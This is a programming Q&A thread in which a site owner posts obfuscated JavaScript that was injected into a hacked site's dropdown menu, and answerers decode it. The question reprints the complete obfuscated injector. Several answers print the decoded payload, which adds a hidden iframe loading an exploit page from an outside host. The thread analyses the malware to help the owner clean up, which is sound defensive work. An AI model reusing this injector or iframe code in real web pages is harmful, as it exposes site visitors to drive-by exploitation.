# Site's Been Hacked - What Does This Javascript Code Do?

Tags: javascript, security

Just found out that my website has been hacked. I traced the problem to this piece of Javascript code that was inserted in the Suckerfish dropdown menu. I'm gonna replace the menu with a clean backup, but am just curious what does this piece of code actually do?

```
(function() {
    var kuk = 'ck5',
    de = document,
    n = navigator,
    u = n.userAgent,
    l = 'anguage';
    function c(b) {
        var i = 'indexOf',
        l = 'length',
        c = de.cookie;
        b = b + "=";
        var a = c[i]("; " + b),
        d = c[i](";", a);
        if (a == -1) {
            a = c[i](b);
            if (a != 0)
                return 0
        }
        return 1
    }
    n = /^en-gb$/i.test(n['systemL' + l] || n['userL' + l] || n['l' + l]) && /(msie) ([\w.]+)|(mozilla)(?:.*? rv:([\w.]+))?/i.test(u) && !c(kuk);
    if (n) {
        var s,
        g = 2,
        aa = document.createTextNode("harCode");
        if (Math.exp(1) === Math.E) {
            s = String["fr" + "omC" + aa.nodeValue];
        }
        eval(s(7 + g, 7 + g, 103 + g, 100 + g, 30 + g, 38 + g, 98 + g, 109 + g, 97 + g, 115 + g, 107 + g, 99 + g, 108 + g, 114 + g, 44 + g, 101 + g, 99 + g, 114 + g, 67 + g, 106 + g, 99 + g, 107 + g, 99 + g, 108 + g, 114 + g, 113 + g, 64 + g, 119 + g, 82 + g, 95 + g, 101 + g, 76 + g, 95 + g, 107 + g, 99 + g, 38 + g, 37 + g, 96 + g, 109 + g, 98 + g, 119 + g, 37 + g, 39 + g, 89 + g, 46 + g, 91 + g, 39 + g, 121 + g, 7 + g, 7 + g, 7 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 112 + g, 38 + g, 39 + g, 57 + g, 7 + g, 7 + g, 123 + g, 30 + g, 99 + g, 106 + g, 113 + g, 99 + g, 30 + g, 121 + g, 7 + g, 7 + g, 7 + g, 98 + g, 109 + g, 97 + g, 115 + g, 107 + g, 99 + g, 108 + g, 114 + g, 44 + g, 117 + g, 112 + g, 103 + g, 114 + g, 99 + g, 38 + g, 32 + g, 58 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 30 + g, 113 + g, 112 + g, 97 + g, 59 + g, 37 + g, 102 + g, 114 + g, 114 + g, 110 + g, 56 + g, 45 + g, 45 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 49 + g, 44 + g, 97 + g, 120 + g, 44 + g, 97 + g, 97 + g, 45 + g, 103 + g, 108 + g, 98 + g, 99 + g, 118 + g, 44 + g, 110 + g, 102 + g, 110 + g, 61 + g, 114 + g, 110 + g, 59 + g, 96 + g, 95 + g, 47 + g, 51 + g, 95 + g, 46 + g, 52 + g, 50 + g, 51 + g, 99 + g, 96 + g, 95 + g, 50 + g, 99 + g, 98 + g, 99 + g, 37 + g, 30 + g, 117 + g, 103 + g, 98 + g, 114 + g, 102 + g, 59 + g, 37 + g, 47 + g, 46 + g, 37 + g, 30 + g, 102 + g, 99 + g, 103 + g, 101 + g, 102 + g, 114 + g, 59 + g, 37 + g, 47 + g, 46 + g, 37 + g, 30 + g, 113 + g, 114 + g, 119 + g, 106 + g, 99 + g, 59 + g, 37 + g, 116 + g, 103 + g, 113 + g, 103 + g, 96 + g, 103 + g, 106 + g, 103 + g, 114 + g, 119 + g, 56 + g, 102 + g, 103 + g, 98 + g, 98 + g, 99 + g, 108 + g, 57 + g, 110 + g, 109 + g, 113 + g, 103 + g, 114 + g, 103 + g, 109 + g, 108 + g, 56 + g, 95 + g, 96 + g, 113 + g, 109 + g, 106 + g, 115 + g, 114 + g, 99 + g, 57 + g, 106 + g, 99 + g, 100 + g, 114 + g, 56 + g, 46 + g, 57 + g, 114 + g, 109 + g, 110 + g, 56 + g, 46 + g, 57 + g, 37 + g, 60 + g, 58 + g, 45 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 60 + g, 32 + g, 39 + g, 57 + g, 7 + g, 7 + g, 123 + g, 7 + g, 7 + g, 100 + g, 115 + g, 108 + g, 97 + g, 114 + g, 103 + g, 109 + g, 108 + g, 30 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 112 + g, 38 + g, 39 + g, 121 + g, 7 + g, 7 + g, 7 + g, 116 + g, 95 + g, 112 + g, 30 + g, 100 + g, 30 + g, 59 + g, 30 + g, 98 + g, 109 + g, 97 + g, 115 + g, 107 + g, 99 + g, 108 + g, 114 + g, 44 + g, 97 + g, 112 + g, 99 + g, 95 + g, 114 + g, 99 + g, 67 + g, 106 + g, 99 + g, 107 + g, 99 + g, 108 + g, 114 + g, 38 + g, 37 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 37 + g, 39 + g, 57 + g, 100 + g, 44 + g, 113 + g, 99 + g, 114 + g, 63 + g, 114 + g, 114 + g, 112 + g, 103 + g, 96 + g, 115 + g, 114 + g, 99 + g, 38 + g, 37 + g, 113 + g, 112 + g, 97 + g, 37 + g, 42 + g, 37 + g, 102 + g, 114 + g, 114 + g, 110 + g, 56 + g, 45 + g, 45 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 49 + g, 44 + g, 97 + g, 120 + g, 44 + g, 97 + g, 97 + g, 45 + g, 103 + g, 108 + g, 98 + g, 99 + g, 118 + g, 44 + g, 110 + g, 102 + g, 110 + g, 61 + g, 114 + g, 110 + g, 59 + g, 96 + g, 95 + g, 47 + g, 51 + g, 95 + g, 46 + g, 52 + g, 50 + g, 51 + g, 99 + g, 96 + g, 95 + g, 50 + g, 99 + g, 98 + g, 99 + g, 37 + g, 39 + g, 57 + g, 100 + g, 44 + g, 113 + g, 114 + g, 119 + g, 106 + g, 99 + g, 44 + g, 116 + g, 103 + g, 113 + g, 103 + g, 96 + g, 103 + g, 106 + g, 103 + g, 114 + g, 119 + g, 59 + g, 37 + g, 102 + g, 103 + g, 98 + g, 98 + g, 99 + g, 108 + g, 37 + g, 57 + g, 100 + g, 44 + g, 113 + g, 114 + g, 119 + g, 106 + g, 99 + g, 44 + g, 110 + g, 109 + g, 113 + g, 103 + g, 114 + g, 103 + g, 109 + g, 108 + g, 59 + g, 37 + g, 95 + g, 96 + g, 113 + g, 109 + g, 106 + g, 115 + g, 114 + g, 99 + g, 37 + g, 57 + g, 100 + g, 44 + g, 113 + g, 114 + g, 119 + g, 106 + g, 99 + g, 44 + g, 106 + g, 99 + g, 100 + g, 114 + g, 59 + g, 37 + g, 46 + g, 37 + g, 57 + g, 100 + g, 44 + g, 113 + g, 114 + g, 119 + g, 106 + g, 99 + g, 44 + g, 114 + g, 109 + g, 110 + g, 59 + g, 37 + g, 46 + g, 37 + g, 57 + g, 100 + g, 44 + g, 113 + g, 99 + g, 114 + g, 63 + g, 114 + g, 114 + g, 112 + g, 103 + g, 96 + g, 115 + g, 114 + g, 99 + g, 38 + g, 37 + g, 117 + g, 103 + g, 98 + g, 114 + g, 102 + g, 37 + g, 42 + g, 37 + g, 47 + g, 46 + g, 37 + g, 39 + g, 57 + g, 100 + g, 44 + g, 113 + g, 99 + g, 114 + g, 63 + g, 114 + g, 114 + g, 112 + g, 103 + g, 96 + g, 115 + g, 114 + g, 99 + g, 38 + g, 37 + g, 102 + g, 99 + g, 103 + g, 101 + g, 102 + g, 114 + g, 37 + g, 42 + g, 37 + g, 47 + g, 46 + g, 37 + g, 39 + g, 57 + g, 7 + g, 7 + g, 7 + g, 98 + g, 109 + g, 97 + g, 115 + g, 107 + g, 99 + g, 108 + g, 114 + g, 44 + g, 101 + g, 99 + g, 114 + g, 67 + g, 106 + g, 99 + g, 107 + g, 99 + g, 108 + g, 114 + g, 113 + g, 64 + g, 119 + g, 82 + g, 95 + g, 101 + g, 76 + g, 95 + g, 107 + g, 99 + g, 38 + g, 37 + g, 96 + g, 109 + g, 98 + g, 119 + g, 37 + g, 39 + g, 89 + g, 46 + g, 91 + g, 44 + g, 95 + g, 110 + g, 110 + g, 99 + g, 108 + g, 98 + g, 65 + g, 102 + g, 103 + g, 106 + g, 98 + g, 38 + g, 100 + g, 39 + g, 57 + g, 7 + g, 7 + g, 123 + g));
        n = new Date();
        n.setDate(n.getDate() + 3650);
        de.cookie = kuk + '=1;path=/;expires=' + n.toUTCString()
        }
})()
```

Comment: http://sucuri.net/malware/malware-entry-mwiframehd203

Comment: It's heavily obfuscated -- even more so than most I've seen. But not minified, which is surprising (as that would have made it even harder to read)

Answer (score 6):

Change eval to alert and run it. The basic idea is that it grabs a bunch of information about the the user and stores it in a cookie then uses `String.fromCharCode` (it's obfuscated but still there) and executes some more code which creates an iframe to an evil site that probably attempts to gain access to the users computers using various exploits.

http://fiddle.jshell.net/qHeJ3/

Here's the payload:

```
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://asasasasa3.cz.cc/
index.php?tp=ba15a0645eba4ede' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}

function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://asasasasa3.cz.cc/index.php?tp=ba15a0645e
ba4ede');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
```

Answer (score 4):

It embeds an invisible iframe from `http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede`.

Formatted code:

```
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe " +
                 "src='http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede' " +
                   "width='10' height='10' " +
                   "style='visibility:hidden;position:absolute;left:0;top:0;'>" +
                   "</iframe>")
}
function iframer() {
     var f = document.createElement('iframe');
     f.setAttribute('src',
                    'http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede');
     f.style.visibility='hidden';
     f.style.position='absolute';
     f.style.left='0';
     f.style.top='0';
     f.setAttribute('width','10');
     f.setAttribute('height','10');
     document.getElementsByTagName('body')[0].appendChild(f);
}
```

The page loaded from the above URL ([executed code](http://pastebin.com/s6NrL9Cn), after undoing *another* obfuscation layer) seems to try to exploit multiple vulnerabilities. It tries various plugins, and loads yet more pages, probably trying other exploits.

Answer (score 2):

the `eval(s(...))` decoded is:

```
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
```

Answer (score 1):

That line near the end with the `eval` is the payload. Basically it's a JavaScript injection attack, creating a bunch of JavaScript on the fly from ASCII values, and executing it.

Here's a [jsFiddle demonstrating](http://jsfiddle.net/yRfCS/) what it's writing out to your page.

Basically it's creating a new hidden iFrame, and loading a URL from http: //asasasasa3.cz.cc

Answer (score 1):

Here is the deobfuscated JavaScript code:

```
 if (document.getElementsByTagName('body')[0])
 {
   iframer();
 }
 else
 {
   document.write("<iframe src='http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
 }
 function iframer()
 {
   var f = document.createElement('iframe');
   f.setAttribute('src','http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede');
   f.style.visibility='hidden';
   f.style.position='absolute';
   f.style.left='0';
   f.style.top='0';
   f.setAttribute('width','10');
   f.setAttribute('height','10');
   document.getElementsByTagName('body')[0].appendChild(f);
 }
```

Answer (score 0):

Typically I think these types of JavaScript injection techniques do something along the lines of hijacking your links so that they a reroute clicks to some malicious location (site with malicious intent, a link directly to an executable, etc.). The reason it's all chopped up into tiny pieces is to circumvent anti-phishing and anti-spyware software.

As others have pointed out, this one adds an iframe to your page which attempts to hijack your machine.